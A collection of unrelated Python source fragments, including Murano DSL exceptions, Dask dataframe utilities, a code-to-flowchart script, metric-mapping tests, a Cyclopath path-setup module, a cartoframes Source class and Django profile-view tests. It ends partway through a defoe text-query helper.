packages = ', '.join("{0}/{1}".format(p.name, p.version)
for p in packages)
super(NoClassFound, self).__init__(
'Class "{0}" is not found in {1}'.format(name, packages))
class NoPackageFound(Exception):
def __init__(self, name):
super(NoPackageFound, self).__init__(
'Package "%s" is not found' % name)
class NoPackageForClassFound(Exception):
def __init__(self, name):
super(NoPackageForClassFound, self).__init__('Package for class "%s" '
'is not found' % name)
class NoObjectFoundError(Exception):
def __init__(self, object_id):
super(NoObjectFoundError, self).__init__(
'Object "%s" is not found in object store' % object_id)
class AmbiguousMethodName(Exception):
def __init__(self, name):
super(AmbiguousMethodName, self).__init__(
'Found more than one method "%s"' % name)
class AmbiguousClassName(Exception):
def __init__(self, name):
super(AmbiguousClassName, self).__init__(
'Found more than one version of class "%s"' % name)
class DslContractSyntaxError(Exception):
pass
class ContractViolationException(Exception):
def __init__(self, *args, **kwargs):
super(ContractViolationException, self).__init__(*args, **kwargs)
self._path = ''
@property
def path(self):
return self._path
@path.setter
def path(self, value):
self._path = value
class ValueIsMissingError(Exception):
pass
class DslSyntaxError(Exception):
pass
class PropertyAccessError(Exception):
pass
class AmbiguousPropertyNameError(PropertyAccessError):
def __init__(self, name):
super(AmbiguousPropertyNameError, self).__init__(
'Found more than one property "%s"' % name)
class NoWriteAccess(PropertyAccessError):
def __init__(self, name):
super(NoWriteAccess, self).__init__(
'Property "%s" is immutable to the caller' % name)
class NoWriteAccessError(PropertyAccessError):
def __init__(self, name):
super(NoWriteAccessError, self).__init__(
'Property "%s" is immutable to the caller' % name)
class PropertyReadError(PropertyAccessError):
def __init__(self, name, murano_class):
super(PropertyReadError, self).__init__(
'Property "%s" in class "%s" cannot be read' %
(name, murano_class.name))
class PropertyWriteError(PropertyAccessError):
def __init__(self, name, murano_class):
super(PropertyWriteError, self).__init__(
'Property "%s" in class "%s" cannot be written' %
(name, murano_class.name))
class UninitializedPropertyAccessError(PropertyAccessError):
def __init__(self, name, murano_class):
super(UninitializedPropertyAccessError, self).__init__(
'Access to uninitialized property '
'"%s" in class "%s" is forbidden' % (name, murano_class.name))
class CircularExpressionDependenciesError(Exception):
pass
class InvalidLhsTargetError(Exception):
def __init__(self, target):
super(InvalidLhsTargetError, self).__init__(
'Invalid assignment target "%s"' % target)
class InvalidInheritanceError(Exception):
pass
|
from typing import Any, Callable, List, Optional
import dask.dataframe as dd
import numpy as np
import pandas as pd
import pyarrow as pa
from slide.exceptions import SlideInvalidOperation
from slide.utils import SlideUtils
from triad.utils.assertion import assert_or_throw
from triad.utils.pyarrow import to_pandas_dtype
class DaskUtils(SlideUtils[dd.DataFrame, dd.Series]):
"""A collection of Dask utils"""
def is_series(self, obj: Any) -> bool:
return isinstance(obj, dd.Series)
def to_series(self, obj: Any, name: Optional[str] = None) -> dd.Series:
if self.is_series(obj):
if name is not None and obj.name != name:
return obj.rename(name)
return obj
if isinstance(obj, (np.ndarray, list)):
return dd.from_array(np.array(obj), columns=name)
if isinstance(obj, pd.Series):
res = dd.from_pandas(obj, chunksize=50000)
if name is not None and res.name != name:
return res.rename(name)
return res
raise NotImplementedError # pragma: no cover
def series_to_array(self, col: dd.Series) -> List[Any]:
return col.compute().tolist()
def to_constant_series(
self,
constant: Any,
from_series: dd.Series,
dtype: Any = None,
name: Optional[str] = None,
) -> dd.Series:
if dtype is not None:
return from_series.map(lambda _: constant, meta=(name, dtype))
tdf = from_series.to_frame()
tn = name or "_tmp_"
tdf[tn] = constant
return tdf[tn]
def cols_to_df(
self, cols: List[Any], names: Optional[List[str]] = None
) -> dd.DataFrame:
assert_or_throw(
any(self.is_series(s) for s in cols),
SlideInvalidOperation("at least one value in cols should be series"),
)
if names is None:
col_names: List[str] = [c.name for c in cols]
else:
col_names = names
for i in range(len(cols)):
if self.is_series(cols[i]):
break
tdf = cols[i].to_frame(col_names[i])
for j in range(len(cols)):
if i != j:
tdf[col_names[j]] = cols[j]
return tdf[col_names]
def is_compatile_index(self, df: dd.DataFrame) -> bool:
"""Check whether the datafame is compatible with the operations inside
this utils collection
:param df: dask dataframe
:return: if it is compatible
"""
return (
isinstance(
df.index,
(pd.RangeIndex, pd.Int64Index, pd.UInt64Index, dd.Index),
)
or self.empty(df)
)
def sql_groupby_apply(
self,
df: dd.DataFrame,
cols: List[str],
func: Callable[[dd.DataFrame], dd.DataFrame],
output_schema: Optional[pa.Schema] = None,
**kwargs: Any,
) -> dd.DataFrame:
assert_or_throw(
output_schema is not None, ValueError("for Dask, output_schema is required")
)
meta = to_pandas_dtype(output_schema, use_extension_types=True)
self.ensure_compatible(df)
if len(cols) == 0:
return df.map_partitions(func, meta=meta).reset_index(drop=True)
return (
df.groupby(cols, dropna=False, group_keys=False)
.apply(lambda tdf: func(tdf.reset_index(drop=True)), meta=meta, **kwargs)
.reset_index(drop=True)
)
def as_pandas(self, df: dd.DataFrame) -> pd.DataFrame:
return df.compute()
def filter_df(self, df: dd.DataFrame, cond: Any) -> dd.DataFrame:
c = self._safe_bool(cond)
if self.is_series(c):
return df[c]
elif c:
return df
else:
return dd.from_pandas(df.head(0), npartitions=2)
def _cast_to_datetime(
self,
col: dd.Series,
from_type: pa.DataType,
inf_type: pa.DataType,
safe_dtype: np.dtype,
) -> dd.Series:
return dd.to_datetime(col)
def _cast_to_float(
self,
col: dd.Series,
from_type: pa.DataType,
inf_type: pa.DataType,
safe_dtype: np.dtype,
) -> dd.Series:
if pd.__version__ < "1.2": # pragma: no cover
if pa.types.is_string(inf_type):
return col.fillna("nan").astype(safe_dtype)
return super()._cast_to_float(
col=col, from_type=from_type, inf_type=inf_type, safe_dtype=safe_dtype
)
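# A minimal usage sketch (illustrative only, not part of the library) showing how
# cols_to_df assembles a mix of Dask series and constants into one dataframe.
# The column names and sample values are made up, and it is assumed here that
# DaskUtils can be constructed without arguments.
if __name__ == "__main__":  # pragma: no cover
    utils = DaskUtils()
    pdf = pd.DataFrame({"a": [1, 2, 3], "b": [4.0, 5.0, 6.0]})
    ddf = dd.from_pandas(pdf, npartitions=1)
    combined = utils.cols_to_df([ddf["a"], 10], names=["a", "const"])
    print(utils.as_pandas(combined))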
|
from node import *
from regexes import *
from sys import argv
import pickle
if len(argv) < 3:
print("Usage: python3 %s [input code file] [output flowchart file]" % argv[0])
raise SystemExit()
"""
start = StartNode()
a_in = InputNode("A")
b_in = InputNode("B")
a_lt_b = ConditionalNode("A < B")
a_dec_b = Node("A = A - B")
a_out = OutputNode("A")
stop = StopNode()
start.connect(a_in)
a_in.connect(b_in)
b_in.connect(a_lt_b)
a_lt_b.if_yes(a_out)
a_lt_b.if_no(a_dec_b)
a_dec_b.connect(a_lt_b)
a_out.connect(stop)
walkthrough(start)
"""
lines = list(filter(lambda c: len(c), map(lambda line: line.rstrip().replace(" ", "~"), open(argv[1]))))
def get_handle(code):
nodes = list()
while len(code):
line = code[0]
print(line)
if line[-1] == ":":
blank = ConnectorNode()
print("block node")
if loop.match(line):
print("loop node")
loop_br = ConditionalNode(loop.match(line).groups()[0])
body = list()
while (len(code)-1) and code[1][0] == "~":
body.append(code[1][1:])
del code[1]
print("body: %s" % str(body))
body_flow = get_handle(body)
print("body flow: %s" % str(body_flow))
loop_br.if_yes(body_flow[0])
body_flow[-1].connect(loop_br)
loop_br.if_no(blank)
if len(nodes):
nodes[-1].connect(loop_br)
else:
nodes.append(loop_br)
elif branch.match(line):
print("conditional node")
con_br = ConditionalNode(branch.match(line).groups()[0])
body = list()
while (len(code)-1) and code[1][0] == "~":
body.append(code[1][1:])
del code[1]
print("body: %s"% str(body))
body_flow = get_handle(body)
print("body flow: %s" % str(body_flow))
if len(code)-1 and code[1] == "else:":
print("ELSE CLAUSE PRESENT")
else_body = list()
print(code)
del code[1]
while (len(code)-1) and code[1][0] == "~":
print(code)
else_body.append(code[1][1:])
del code[1]
print("else body: %s" % str(else_body))
else_body_flow = get_handle(else_body)
print("else body flow: %s" % str(else_body_flow))
con_br.if_yes(body_flow[0])
con_br.if_no(else_body_flow[0])
body_flow[-1].connect(blank)
else_body_flow[-1].connect(blank)
else:
con_br.if_yes(body_flow[0])
body_flow[-1].connect(blank)
con_br.if_no(blank)
print(nodes)
if len(nodes):
nodes[-1].connect(con_br)
else:
nodes.append(con_br)
nodes.append(blank)
elif read.match(line):
this = InputNode(read.match(line).groups()[0])
if len(nodes):
nodes[-1].connect(this)
nodes.append(this)
elif write.match(line):
this = OutputNode(write.match(line).groups()[0])
if len(nodes):
nodes[-1].connect(this)
nodes.append(this)
else:
this = Node(line)
if len(nodes):
nodes[-1].connect(this)
nodes.append(this)
del code[0]
print(nodes)
return nodes
process = get_handle(lines)
begin = StartNode()
begin.connect(process[0])
end = StopNode()
process[-1].connect(end)
pickle.dump(begin, open(argv[2], "wb")) |
# Copyright 2019, Aiven, https://aiven.io/
from logging import getLogger
from sfxbridge.mapper import Mapper
from sfxbridge.maps.metrics import DataPointType
log = getLogger(__name__)
def test_simple_mapping():
mapper = Mapper(log=log, whitelist=["load.midterm"], service=None)
mapper.process([
{
"fields": {
"load1": 0.54,
"load15": 0.23,
"load5": 0.47,
"n_cpus": 1,
"n_users": 1
},
"name": "system",
"tags": {
"cloud": "google-europe-north1",
"host": "pg-2",
"project": "test",
"service": "pg",
"service_type": "pg"
},
"timestamp": 1570444470
},
])
assert mapper.datapoints == {
DataPointType.gauge: [{
"dimensions": {
"cluster": "pg",
"host": "pg-2",
"plugin": "load",
},
"metric": "load.midterm",
"value": 0.47,
"timestamp": 1570444470000,
}]
}
# Test constructed metrics
def test_cpu_utilization():
mapper = Mapper(log=log, whitelist=["cpu.utilization"], service=None)
mapper.process([
{
"fields": {
"usage_guest": 0,
"usage_guest_nice": 0,
"usage_idle": 90.9303101033699,
"usage_iowait": 1.4671557185728608,
"usage_irq": 0.26675558519508497,
"usage_nice": 0,
"usage_softirq": 0.13337779259753063,
"usage_steal": 0,
"usage_system": 2.4341447149050466,
"usage_user": 4.768256085361656
},
"name": "cpu",
"tags": {
"cloud": "google-europe-north1",
"cpu": "cpu-total",
"host": "pg-2",
"project": "test",
"service": "pg",
"service_type": "pg"
},
"timestamp": 1570444500
},
])
assert mapper.datapoints == {
DataPointType.gauge: [{
"dimensions": {
"cluster": "pg",
"host": "pg-2",
"plugin": "signalfx-metadata",
},
"metric": "cpu.utilization",
"value": 9.07,
"timestamp": 1570444500000,
}]
}
def test_network_total():
mapper = Mapper(log=log, whitelist=["network.total"], service=None)
mapper.process([
{
"fields": {
"bytes_recv": 156796692,
"bytes_sent": 24029619,
"drop_in": 0,
"drop_out": 0,
"err_in": 0,
"err_out": 0,
"packets_recv": 168056,
"packets_sent": 100486
},
"name": "net",
"tags": {
"cloud": "google-europe-north1",
"host": "pg-2",
"interface": "eth0",
"project": "test",
"service": "pg",
"service_type": "pg"
},
"timestamp": 1570444500
},
{
"fields": {
"icmp_inaddrmaskreps": 0,
"icmp_inaddrmasks": 0,
"udplite_outdatagrams": 0,
"udplite_rcvbuferrors": 0,
"udplite_sndbuferrors": 0
},
"name": "net",
"tags": {
"cloud": "google-europe-north1",
"host": "pg-2",
"interface": "all",
"project": "test",
"service": "pg",
"service_type": "pg"
},
"timestamp": 1570444500,
},
])
assert mapper.datapoints == {
DataPointType.counter: [{
"dimensions": {
"cluster": "pg",
"host": "pg-2",
},
"metric": "network.total",
"value": 156796692 + 24029619,
"timestamp": 1570444500000,
}]
}
|
# Copyright (c) 2006-2013 Regents of the University of Minnesota.
# For licensing terms, see the file LICENSE.
import os
import sys
# Pyserver's conf.py wants the pyserver directory to be the current directory.
# And for importing pyserver sub-modules to work, we need the pyserver
# directory to be the current directory. We also need to add the dir to
# sys.path.
# SYNC_ME: Search pyserver module name.
dirname_pyserver = 'pyserver'
# Check that INSTANCE is set.
# FIXME: Should INSTANCE (and other env vars) be commonly prefixed?
# E.g., CCP_INSTANCE, CCP_PYSERVER_HOME, etc.?
# And just what are all the env vars that Cyclopath uses?
try:
from mod_python import apache
# This means we're running from apache. And under apache, INSTANCE isn't
# set. But we can tell what instance is specified in httpd.conf by reading
# its PythonInterpreter value. Note that every Cyclopath installation on
# the server has a unique name that goes [instance]___[my_ccp_dev_dir],
# e.g., minnesota___ccpv3_trunk
instance_raw = apache.interpreter
# See /var/log/apache2/error.log, or maybe /ccp/var/log/apache2/error.log.
error_log = apache.log_error
except ImportError:
# We have yet to set up logging; log to, e.g., /var/log/apache2/error.log.
error_log = sys.stderr.write
try:
instance_raw = os.environ['INSTANCE']
except KeyError:
instance_raw = ''
#
uniquely_starts = instance_raw.find('___')
if uniquely_starts != -1:
instance_name = instance_raw[:uniquely_starts]
else:
instance_name = instance_raw
# We used to set an env. var. but let's avoid a race condition with other
# Apache forks, since the env. seems to be shared among our processes.
# No: os.environ['INSTANCE'] = instance_name
#
if not instance_name:
error_log('ERROR: Please set the INSTANCE environment variable (py_glue).')
sys.exit(1)
# We hard-code the path separator, so make sure it's what we think 'tis.
assert(os.path.sep == '/') # We only run on Linux.
# If $PYSERVER_HOME is set, but to the wrong path, you'll get weird errors,
# e.g., ./ccp.py -i ==> ConfigParser.NoSectionError: No section: 'gwis'.
# because $PYSERVER_HOME set to a V1 path.
try:
# See if the user or script supplied the directory as an environment var.
# SYNC_ME: Search environment variable: PYSERVER_HOME.
pyserver_home = os.environ['PYSERVER_HOME']
except KeyError:
# Otherwise, if the user or script is running this script from somewhere
# within the Cyclopath source directory, we can deduce pyserver's home.
# NOTE: sys.path[0] is the absolute path to the script, which we need to
# use in case the calling script was invoked from a directory other
# than its own.
# NOTE: If you run py interactively, sys.path[0] is '', and abspath('')
# resolves to the current directory...
walk_path = os.path.abspath(sys.path[0])
depth = 1
pyserver_home = ''
while not pyserver_home:
# EXPLAIN: Why doesn't this use os.path.join?
test_this_path = os.path.abspath('%s/%s' % (walk_path,
dirname_pyserver,))
#print 'test_this_path: %s' % (test_this_path,)
# See if the test path is really a path.
if os.path.isdir(test_this_path):
# Ooh, this is good news. See if we can find ourselves a VERSION.py.
# Note that this will have required that flashclient has been built.
if os.path.isfile('%s/VERSION.py' % (test_this_path)):
# Whooptie-doo! We have ourselves a pyserver_home.
pyserver_home = test_this_path
break
# If we didn't find pyserver_home, try the next directory in the
# ancestry, and do some error checking.
assert(not pyserver_home) # There's a 'break' above...
new_walk_path = os.path.dirname(walk_path)
assert(new_walk_path != walk_path)
walk_path = new_walk_path
# If we hit rock bottom...
if walk_path == '/':
sys.stderr.write('Got to root. Something is wrong. Buh-bye!\n')
sys.exit(1)
# Increase your loop confidence.
# MAGIC NUMBER: Just guessing that 32 is very unlikely path depth.
depth += 1
if depth > 32:
sys.stderr.write('Tired of looping. Giving up!\n')
sys.exit(1)
# Set the PYSERVER_HOME env var for the rest of the app.
# NO: Race condition with our Cyclopath server installations:
# The next URL request -- even on a different server install --
# will inherit the environment variables for this process. So
# don't set environment variables inside the app.
# No: os.environ['PYSERVER_HOME'] = pyserver_home
# 2013.09.03: Let's add mapserver/ to the path, too, so we can always skin.
mapserver_home = '%s/mapserver' % (os.path.dirname(pyserver_home),)
sys.path.insert(0, mapserver_home)
# 2013.10.24: Let's add services/ to the path, too.
services_home = '%s/services' % (os.path.dirname(pyserver_home),)
sys.path.insert(0, services_home)
sys.path.insert(0, pyserver_home)
os.chdir(pyserver_home)
if __name__ == '__main__':
import conf
print 'Seems OK...'
|
<reponame>oss-spanish-geoserver/cartoframes
from __future__ import absolute_import
import re
import pandas
from . import defaults
from ..geojson import get_encoded_data, get_bounds
from ..data import Dataset, get_query, get_geodataframe
try:
import geopandas
HAS_GEOPANDAS = True
except ImportError:
HAS_GEOPANDAS = False
class SourceType:
QUERY = 'Query'
GEOJSON = 'GeoJSON'
class Source(object):
"""Source
Args:
data (str, :py:class:`GeoFrame <geopandas.GeoDataFrame>`,
:py:class:`Dataset <cartoframes.viz.Dataset>`): a table name, SQL query,
GeoJSON file, GeoDataFrame object or Dataset object.
context (:py:class:`Context <cartoframes.Context>`):
A Context instance. If not provided, the context will be automatically
obtained from the default context.
bounds (dict or list): a dict with `east`,`north`,`west`,`south`
properties, or a list of floats in the following order: [west,
south, east, north]. If not provided the bounds will be automatically
calculated to fit all features.
Example:
Table name.
.. code::
from cartoframes.auth import set_default_context
from cartoframes.viz import Source
set_default_context(
base_url='https://your_user_name.carto.com',
api_key='your api key'
)
Source('table_name')
SQL query.
.. code::
from cartoframes.auth import set_default_context
from cartoframes.viz import Source
set_default_context(
base_url='https://your_user_name.carto.com',
api_key='your api key'
)
Source('SELECT * FROM table_name')
GeoJSON file.
.. code::
from cartoframes.auth import set_default_context
from cartoframes.viz import Source
set_default_context(
base_url='https://your_user_name.carto.com',
api_key='your api key'
)
Source('path/to/file.geojson')
Dataset object.
.. code::
from cartoframes.auth import set_default_context
from cartoframes.viz import Source
from cartoframes.data import Dataset
set_default_context(
base_url='https://your_user_name.carto.com',
api_key='your api key'
)
ds = Dataset.from_table('table_name')
Source(ds)
Setting the context.
.. code::
from cartoframes.auth import Context
from cartoframes.viz import Source
context = Context(
base_url='https://your_user_name.carto.com',
api_key='your api key'
)
Source('table_name', context)
Setting the bounds.
.. code::
from cartoframes.auth import set_default_context
from cartoframes.viz import Source
set_default_context(
base_url='https://your_user_name.carto.com',
api_key='your api key'
)
bounds = {
'west': -10,
'east': 10,
'north': -10,
'south': 10
}
Source('table_name', bounds=bounds)
"""
def __init__(self, data, context=None, bounds=None, schema=None):
self._init_source(data, context, bounds, schema)
self.context = _get_context(self.dataset)
self.geom_type = _get_geom_type(self.dataset)
self.credentials = _get_credentials(self.dataset)
def _init_source(self, data, context, bounds, schema):
if isinstance(data, str):
if _check_sql_query(data):
self._init_source_query(data, context, bounds)
elif _check_geojson_file(data):
self._init_source_geojson(data, bounds)
elif _check_table_name(data):
self._init_source_table(data, context, schema, bounds)
elif isinstance(data, (list, dict)):
self._init_source_geojson(data, bounds)
elif HAS_GEOPANDAS and isinstance(data, geopandas.GeoDataFrame):
self._init_source_geodataframe(data, bounds)
elif isinstance(data, pandas.DataFrame):
self._init_source_dataframe(data, bounds)
elif isinstance(data, Dataset):
self._init_source_dataset(data, bounds)
else:
raise ValueError('Wrong source input')
def _init_source_table(self, data, context, schema, bounds):
self.dataset = Dataset.from_table(data, context, schema)
self._set_source_query(self.dataset, bounds)
def _init_source_query(self, data, context, bounds):
self.dataset = Dataset.from_query(data, context)
self._set_source_query(self.dataset, bounds)
def _init_source_geojson(self, data, bounds):
self.dataset = Dataset.from_geojson(data)
self._set_source_geojson(self.dataset, bounds)
def _init_source_geodataframe(self, data, bounds):
self.dataset = Dataset.from_geodataframe(data)
self._set_source_geojson(self.dataset, bounds)
def _init_source_dataframe(self, data, bounds):
self.dataset = Dataset.from_dataframe(data)
self._set_source_geojson(self.dataset, bounds)
def _init_source_dataset(self, data, bounds):
self.dataset = data
if self.dataset._state == Dataset.STATE_REMOTE:
self._set_source_query(self.dataset, bounds)
elif self.dataset._state == Dataset.STATE_LOCAL:
self._set_source_geojson(self.dataset, bounds)
def _set_source_query(self, dataset, bounds):
self.type = SourceType.QUERY
self.query = get_query(dataset)
self.bounds = bounds
def _set_source_geojson(self, dataset, bounds):
self.type = SourceType.GEOJSON
gdf = get_geodataframe(dataset)
self.query = get_encoded_data(gdf)
self.bounds = bounds or get_bounds(gdf)
def _check_table_name(data):
return True
def _check_sql_query(data):
return re.match(r'^\s*(WITH|SELECT)\s+', data, re.IGNORECASE)
def _check_geojson_file(data):
return re.match(r'^.*\.geojson\s*$', data, re.IGNORECASE)
def _get_context(dataset):
return dataset.context
def _get_credentials(dataset):
context = _get_context(dataset)
if context and context.creds:
return {
'username': context.creds.username(),
'api_key': context.creds.key(),
'base_url': context.creds.base_url()
}
else:
return defaults.CREDENTIALS
def _get_geom_type(dataset):
return dataset.compute_geom_type() or Dataset.GEOM_TYPE_POINT
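# Illustrative sketch (not part of cartoframes): how the helpers above classify a
# string passed to Source. The sample strings are hypothetical and the function
# below is never called by the library itself.
def _example_source_detection():
    assert _check_sql_query('SELECT * FROM table_name')
    assert _check_geojson_file('path/to/file.geojson')
    assert not _check_geojson_file('table_name')
    # any other string falls back to being treated as a table name
    assert _check_table_name('table_name')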
|
<gh_stars>0
# -*- coding: utf-8 -*-
from django.contrib.auth.models import User
from django.core.urlresolvers import reverse
from django.utils.encoding import iri_to_uri
import mock
from nose.tools import eq_, ok_
from pyquery import PyQuery as pq
from test_utils import TestCase
from remo.base.tests import requires_permission, requires_login
from remo.profiles.tests import FunctionalAreaFactory, UserFactory
class ViewsTest(TestCase):
"""Tests related to Profiles Views."""
def setUp(self):
"""Setup tests."""
self.mentor = UserFactory.create(groups=['Rep', 'Mentor'],
userprofile__initial_council=True)
self.rep = UserFactory.create(groups=['Rep'],
userprofile__mentor=self.mentor)
self.area = FunctionalAreaFactory.create()
profile = self.rep.userprofile
self.data = {'display_name': profile.display_name,
'first_name': self.rep.first_name,
'email': self.rep.email,
'last_name': self.rep.last_name,
'local_name': profile.local_name,
'private_email': self.rep.email,
'twitter_account': profile.twitter_account,
'city': profile.city,
'region': profile.region,
'country': profile.country,
'lon': profile.lon,
'lat': profile.lat,
'mozillians_profile_url': profile.mozillians_profile_url,
'wiki_profile_url': profile.wiki_profile_url,
'jabber_id': u'<EMAIL>',
'irc_name': profile.irc_name,
'linkedin_url': u'http://www.linkedin.com/',
'facebook_url': u'http://www.facebook.com/',
'diaspora_url': u'https://joindiaspora.com/',
'personal_website_url': u'http://www.example.com/',
'personal_blog_feed': u'http://example.com/',
'bio': u'This is my bio.',
'date_joined_program': '2011-07-01',
'mentor': profile.mentor.id,
'functional_areas': self.area.id}
display_name = {'display_name': profile.display_name}
self.user_url = reverse('profiles_view_profile', kwargs=display_name)
self.user_edit_url = reverse('profiles_edit', kwargs=display_name)
self.user_delete_url = reverse('profiles_delete', kwargs=display_name)
def test_view_my_profile_page(self):
"""Get my profile page."""
self.client.login(username=self.mentor.username, password='<PASSWORD>')
response = self.client.get(reverse('profiles_view_my_profile'))
self.assertTemplateUsed(response, 'profiles_view.html')
def test_view_invite_page(self):
"""Get invite page."""
self.client.login(username=self.mentor.username, password='<PASSWORD>')
response = self.client.get(reverse('profiles_invite'))
self.assertTemplateUsed(response, 'profiles_invite.html')
def test_view_list_profiles_page(self):
"""Get list profiles page."""
response = self.client.get(reverse('profiles_list_profiles'))
self.assertTemplateUsed(response, 'profiles_people.html')
def test_view_profile_page(self):
"""Get profile page."""
response = self.client.get(self.user_url)
self.assertTemplateUsed(response, 'profiles_view.html')
def test_view_edit_profile_page(self):
"""Get edit profile page."""
self.client.login(username=self.rep.username, password='<PASSWORD>')
response = self.client.get(self.user_edit_url)
self.assertTemplateUsed(response, 'profiles_edit.html')
def test_view_delete_profile_page(self):
"""Get delete profile page."""
admin = UserFactory.create(groups=['Admin'])
self.client.login(username=admin.username, password='<PASSWORD>')
response = self.client.get(self.user_delete_url, follow=True)
self.assertTemplateUsed(response, 'main.html')
def test_invite_user(self):
"""Test that user is invited."""
self.client.login(username=self.mentor.username, password='<PASSWORD>')
self.client.post(reverse('profiles_invite'),
{'email': '<EMAIL>'})
u = User.objects.get(email='<EMAIL>')
eq_(u.userprofile.added_by, self.mentor)
ok_(u.groups.filter(name='Rep').exists())
def test_edit_profile_permissions_owner(self):
"""Test owner permissions to edit profiles."""
self.client.login(username=self.rep.username, password='<PASSWORD>')
response = self.client.get(self.user_edit_url, follow=True)
self.assertTemplateUsed(response, 'profiles_edit.html')
def test_edit_profile_permissions_admin(self):
"""Test admin permission to edit profile."""
admin = UserFactory.create(groups=['Admin'])
self.client.login(username=admin.username, password='<PASSWORD>')
response = self.client.get(self.user_edit_url, follow=True)
self.assertTemplateUsed(response, 'profiles_edit.html')
@requires_permission()
def test_edit_profile_no_permissions(self):
"""Test user edit other user profile without permission."""
self.client.login(username=self.mentor.username, password='<PASSWORD>')
self.client.get(self.user_edit_url, follow=True)
def test_edit_profile_redirect_admin(self):
"""Test that after edit profile redirection is correct."""
admin = UserFactory.create(groups=['Admin'])
self.client.login(username=admin.username, password='<PASSWORD>')
response = self.client.post(self.user_edit_url, self.data, follow=True)
eq_(response.request['PATH_INFO'], self.user_url)
def test_edit_owner_profile_redirect(self):
"""Test that after edit profile redirection is correct."""
self.client.login(username=self.rep.username, password='<PASSWORD>')
response = self.client.post(self.user_edit_url, self.data, follow=True)
eq_(response.request['PATH_INFO'], reverse('profiles_view_my_profile'))
def test_delete_own_profile(self):
"""Test owner can't delete his profile."""
self.client.login(username=self.rep.username, password='<PASSWORD>')
response = self.client.post(self.user_delete_url, follow=True)
self.assertTemplateUsed(response, 'main.html')
ok_(User.objects.filter(pk=self.rep.id).exists())
@requires_permission()
def test_delete_user_delete_profile_no_perms(self):
"""Test user can't delete profile without permissions."""
user = UserFactory.create(groups=['Rep'])
self.client.login(username=user.username, password='<PASSWORD>')
self.client.post(self.user_delete_url, follow=True)
ok_(User.objects.filter(pk=self.rep.id).exists())
def test_delete_profile_admin(self):
"""Test admin can delete profile."""
admin = UserFactory.create(groups=['Admin'])
self.client.login(username=admin.username, password='<PASSWORD>')
response = self.client.post(self.user_delete_url, {'delete': 'true'},
follow=True)
self.assertTemplateUsed(response, 'main.html')
ok_(not User.objects.filter(pk=self.rep.id).exists())
def test_profiles_me(self):
"""Test that user gets own profile rendered."""
# user gets own profile page rendered
self.client.login(username=self.rep.username, password='<PASSWORD>')
response = self.client.get(reverse('profiles_view_my_profile'),
follow=True)
self.assertTemplateUsed(response, 'profiles_view.html')
@requires_login()
def test_profiles_me_anonymous(self):
# anonymous user get message to login first
self.client.get(reverse('profiles_view_my_profile'), follow=True)
def test_incomplete_profile(self):
"""Test user redirection when profile is incomplete"""
# First name is empty to keep registration_complete=False
user = UserFactory.create(groups=['Rep'], first_name='',
userprofile__registration_complete=False)
self.client.login(username=user.username, password='<PASSWORD>')
response = self.client.get(reverse('profiles_view_my_profile'),
follow=True)
self.assertTemplateUsed(response, 'profiles_edit.html')
def test_case_insensitive_profile_url(self):
"""Test the display_name is case insensitive in profile urls."""
self.client.login(username=self.rep.username, password='<PASSWORD>')
name = self.rep.userprofile.display_name.upper()
response = self.client.get(reverse('profiles_view_profile',
kwargs={'display_name': name}),
follow=True)
self.assertTemplateUsed(response, 'profiles_view.html')
response = self.client.get(reverse('profiles_edit',
kwargs={'display_name': name}),
follow=True)
self.assertTemplateUsed(response, 'profiles_edit.html')
def test_number_of_reps_visibility_unauthed(self):
"""Test visibility of number of reps based on authentication status."""
response = self.client.get(reverse('profiles_list_profiles'),
follow=True)
d = pq(response.content)
eq_(len(d('#profiles-number-of-reps')), 0)
def test_number_of_reps_visibility_authenticated(self):
"""Test visibility of number of reps based on authentication status."""
self.client.login(username=self.rep.username, password='<PASSWORD>')
response = self.client.get(reverse('profiles_list_profiles'),
follow=True)
d = pq(response.content)
eq_(len(d('#profiles-number-of-reps')), 1)
def test_view_incomplete_profile_page_unauthed(self):
"""Test permission to view incomplete profile page unauthenticated."""
user = UserFactory.create(groups=['Rep'], first_name='',
userprofile__registration_complete=False)
name = user.userprofile.display_name
url = reverse('profiles_view_profile',
kwargs={'display_name': name})
response = self.client.get(url, follow=True)
self.assertTemplateUsed(response, '404.html',
'Anonymous can view the page')
def test_view_incomplete_profile_page_authenticated(self):
"""Test view incomplete profile page without permissions."""
user = UserFactory.create(groups=['Rep'], first_name='',
userprofile__registration_complete=False)
name = user.userprofile.display_name
url = reverse('profiles_view_profile',
kwargs={'display_name': name})
self.client.login(username=self.rep.username, password='<PASSWORD>')
response = self.client.get(url, follow=True)
self.assertTemplateUsed(response, '404.html',
'Rep without permission can view the page')
def test_view_incomplete_profile_page_admin(self):
"""Test permission to view incomplete profile page as admin."""
admin = UserFactory.create(groups=['Admin'])
user = UserFactory.create(groups=['Rep'], first_name='',
userprofile__registration_complete=False)
name = user.userprofile.display_name
url = reverse('profiles_view_profile',
kwargs={'display_name': name})
self.client.login(username=admin.username, password='<PASSWORD>')
response = self.client.get(url, follow=True)
self.assertTemplateUsed(response, 'profiles_view.html',
'Admin can\'t view the page')
@mock.patch('remo.profiles.views.iri_to_uri', wraps=iri_to_uri)
def test_view_redirect_list_profiles(self, mocked_uri):
"""Test redirect to profiles list."""
profiles_url = '/people/Paris & Orléans'
response = self.client.get(profiles_url, follow=True)
mocked_uri.assert_called_once_with(u'/Paris & Orléans')
expected_url = '/people/#/Paris%20&%20Orl%C3%A9ans'
self.assertRedirects(response, expected_url=expected_url,
status_code=301, target_status_code=200)
self.assertTemplateUsed(response, 'profiles_people.html')
def test_functional_areas_type(self):
"""Test that functional area type is integer."""
self.client.login(username=self.rep.username, password='<PASSWORD>')
# Post form with invalid data
self.data['wiki_profile_url'] = 'www.example.com'
response = self.client.post(self.user_edit_url, self.data, follow=True)
eq_(response.context['functional_areas'], [self.area.id])
|
"""
Query-related utility functions.
"""
from defoe import query_utils
from defoe.query_utils import PreprocessWordType, longsfix_sentence, xml_geo_entities, georesolve_cmd, coord_xml, geomap_cmd, geoparser_cmd, geoparser_coord_xml
from nltk.corpus import words
import re
import spacy
from spacy.tokens import Doc
from spacy.vocab import Vocab
NON_AZ_REGEXP = re.compile('[^a-z]')
def get_pages_matches_no_prep(title, edition, archive, filename, text, keysentences):
"""
Get pages within a document that include one or more keywords.
For each page that includes a specific keyword, add a tuple of
form:
(<TITLE>, <EDITION>, <ARCHIVE>, <FILENAME>, <TEXT>, <KEYWORD>)
If a keyword occurs more than once on a page, there will be only
one tuple for the page for that keyword.
If more than one keyword occurs on a page, there will be one tuple
per keyword.
:return: list of tuples
"""
matches = []
for keysentence in keysentences:
#sentence_match = get_sentences_list_matches(text, keysentence)
sentence_match_idx = get_text_keyword_idx(text, keysentence)
if sentence_match_idx:
